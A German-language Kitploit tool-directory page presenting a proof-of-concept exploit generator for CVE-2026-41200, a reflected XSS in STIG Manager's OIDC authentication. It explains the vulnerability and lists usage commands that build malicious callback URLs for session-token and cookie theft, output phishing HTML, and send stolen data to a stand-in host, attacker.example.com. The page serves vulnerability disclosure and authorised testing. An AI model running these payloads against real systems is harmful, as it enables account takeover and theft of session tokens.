Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — Proof-of-Concept-Exploit-Generator für reflektiertes XSS in der STIG Manager OIDC-Authentifizierung, der den Diebstahl von Sitzungstokens durch manipulierte Callback-URLs und Phishing-HTML-Ausgabe ermöglicht. | Kitploit
Tools/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Phishing-ToolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Proof-of-Concept-Exploit-Generator für reflektiertes XSS in der STIG Manager OIDC-Authentifizierung, der den Diebstahl von Sitzungstokens durch manipulierte Callback-URLs und Phishing-HTML-Ausgabe ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 MonatenNoch nicht geprüft

CVE-2026-41200 — STIG Manager OIDC Reflected XSS PoC

Konzeptioneller Proof of Concept für die reflektierte Cross-Site Scripting (XSS) Schwachstelle in STIG Manager Versionen 1.5.10 bis 1.6.7.

Zusammenfassung der Schwachstelle

Eine reflektierte XSS-Schwachstelle existiert im STIG Manager Web App OIDC-Authentifizierungsfehlerbehandlungscode. Die Abfrageparameter error und error_description, die vom OIDC-Provider zurückgegeben werden, werden direkt über innerHTML ohne HTML-Escaping in das DOM geschrieben. Ein Angreifer, der eine bösartige URL erstellen und einen Benutzer dazu überreden kann, dieser zu folgen, kann beliebiges JavaScript im Anwendungskontext ausführen.

Die Schwachstelle ist am schwerwiegendsten, wenn der angegriffene Benutzer in einem anderen Browser-Tab eine aktive STIG Manager-Sitzung hat – injizierter Code kann mit dem SharedWorker kommunizieren, der das Zugriffstoken verwaltet, und so authentifizierte API-Anfragen im Namen des Opfers ermöglichen.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (HIGH)
  • Betroffen: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Behoben: v1.6.8
  • Sicherheitshinweis: GHSA-wg33-j3rv-jq72
  • Artikel: hunt-benito.com

Verwendung

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt.

  • Verwenden Sie es nur gegen Installationen, die Ihnen gehören oder für die Sie ausdrücklich autorisiert sind, Tests durchzuführen.
  • Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen illegal.
  • Die Autoren übernehmen keine Haftung für den Missbrauch dieses Tools.
Tool herunterladen